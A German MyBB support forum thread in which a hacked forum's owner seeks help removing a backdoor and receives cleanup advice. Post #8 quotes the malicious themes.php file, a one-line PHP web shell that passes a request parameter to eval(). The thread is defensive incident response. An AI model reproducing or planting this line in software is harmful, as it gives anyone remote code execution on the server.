Hallo, Gast! (Registrieren)

Letzte Ankündigung: MyBB 1.8.8 veröffentlicht (17.10.16)


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste
[Problem] Backdoor Trojaner.
#1
Hi,

laut einer unbekannten Quelle, besitze ich auf meinem Forum einen Backdoor Trojaner.

Nun ist meine Frage, wie kann man Diesen entfernen ?
Zitieren
#2
Hi,
da fehlen ein paar Infos. Wer ist die Quelle? Wenn sie unbekannt ist, woher weißt du es dann?
Zitieren
#3
(02.08.2009, 21:20)querschlaeger schrieb: Hi,
da fehlen ein paar Infos. Wer ist die Quelle? Wenn sie unbekannt ist, woher weißt du es dann?

Das Forum laggt extrem und die Quelle meinte, es wäre ein Backdoor Trojaner.
Wenn wir diesen nicht demnächst entfernen würden, wäre das Forum bald offline.
Zitieren
#4
Hört alles viel zu nebulös an...

Aber wenn du auf Nummer Sicher gehen willst: Ändere alle Passwörter (FTP, SQL, Passwörter der Admins und notfalls noch das Passwort des CP von deinem Provider) - kann nie schaden. Stelle außerdem sicher, dass sich dein MyBB auf der aktuellsten Version befindet bzw. vergleiche die MyBB-Dateien mit denen aus dem offiziellen Paket. Überprüfe auch mal ob die langsame Geschwindigkeit nicht evtl. durch ein Plugin verursacht wird (bei der Gelegenheit auch mal die Plugins auf neuere Versionen prüfene - geht ja einfach im Admin CP).

Ansonsten: Frag deine Quelle mal, wie sie zu so einer Aussage kommt.
Zitieren
#5
Da du von Backdoor sprichst, evtl. das hier: http://community.mybboard.net/thread-52474.html
Zitieren
#6
Hallo,

ich hole diesen Thread noch einmal hoch,

in dem Link steht

Zitat:Look in your ./cache/themes/ folder, if you see a files called themes.php, please delete it.
Quelle

Ich habe gerade in meinem Forum geschaut (wir wurden gehackt) und ich habe eine solche Datei.
Allerdings nicht in /themes/folder sondern in /themes

gehört die dennoch gelöscht oder ist die dort richtig?

Wahrscheinlich gehört sie dort hin, oder?!
Sie ist vor einem Jahr das letzte mal bearbeitet worden, laut Angaben

Aber mir fehlt dann die /themes/folder die habe ich nicht dort als Unterordner
Einen lieben Gruß
Iris
Zitieren
#7
Was steht denn da drin?
[Bild: banner.png]

Bitte die Foren-Regeln beachten und im Profil die verwendete MyBB-Version angeben.
Zitieren
#8
hier das steht drinne:

Code:
<?PHP if (isset($_REQUEST[x])) eval(stripslashes($_REQUEST[x])); ?>
Einen lieben Gruß
Iris
Zitieren
#9
Die Datei muss weg, die ist gefährlich.
[Bild: banner.png]

Bitte die Foren-Regeln beachten und im Profil die verwendete MyBB-Version angeben.
Zitieren
#10
ok, dann werde ich die mal löschen

Danke Smile
um die index-Dateien, also index.php und index.html alle wieder herzustellen, muß ich das alles per hand von einem Backup machen oder kann ich das auch per Upgrade?

Ein Upgrade würde mir dann allerdings wahrscheinlich eine solche Datei, wie eben gelöscht, nicht löschen oder?

wie erkenne ich diese?
Einen lieben Gruß
Iris
Zitieren